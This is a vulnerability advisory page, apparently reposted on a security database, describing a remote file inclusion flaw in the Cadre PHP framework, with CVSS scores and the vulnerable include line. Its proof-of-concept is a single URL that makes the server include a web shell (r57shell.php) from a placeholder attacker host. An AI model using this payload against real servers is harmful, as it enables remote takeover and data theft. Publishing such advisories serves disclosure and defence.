Cadre remote file inclusion

2007.02.07
Risk: High
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

[ECHO_ADV_63$2007] Cadre remote file inclusion ----------------------------------------------- Author : Ahmad Muammar W.K (a.k.a) y3dips Date Found : January, 31st 2007 Location : Indonesia, Jakarta web : http://echo.or.id/adv/adv63-y3dips-2007.txt Critical Lvl : Critical ------------------------------------------------ Affected software description: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Application : Cadre URL : http://www.cronosys.com | http://savannah.gnu.org/projects/cadre/ Download-path : http://ftp.azc.uam.mx/mirrors/gnu/savannah/files/cadre/cadre-20020724.ta r.gz Description : Cadre is a PHP framework for developing large business applications. It currently supports PostgreSQL as the database back end (although this is extensible). We (Cronosys, LLC) have invested two and a half years in this framework and applications based on this framework. ------------------------------------------------ Vulnerability: ~~~~~~~~~~~~~~ --------class.Quick_Config_Browser.php -------- ... include_once($GLOBALS[config][framework_path] . "class.Browser.php"); ... ------------------------------------- An attacker can exploit this vulnerability with a simple php injection script. Poc/Exploit: ~~~~~~~~~~~~ http://target/cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][fr amework_path]=http://attacker/r57shell.php%20? ---------------------------------------------- Shoutz: ~~~~~~~ ~ my lovely ana ~ k-159 (my greatest brotha), the_day (young evil thinker), and all echo staff ~ str0ke, waraxe, negative ~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ~ #e-c-h-o @irc.dal.net ------------------------------------------------ Contact: ~~~~~~~~ y3dips|| echo|staff || y3dips[at]gmail[dot]com Homepage: http://y3dips.echo.or.id/


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top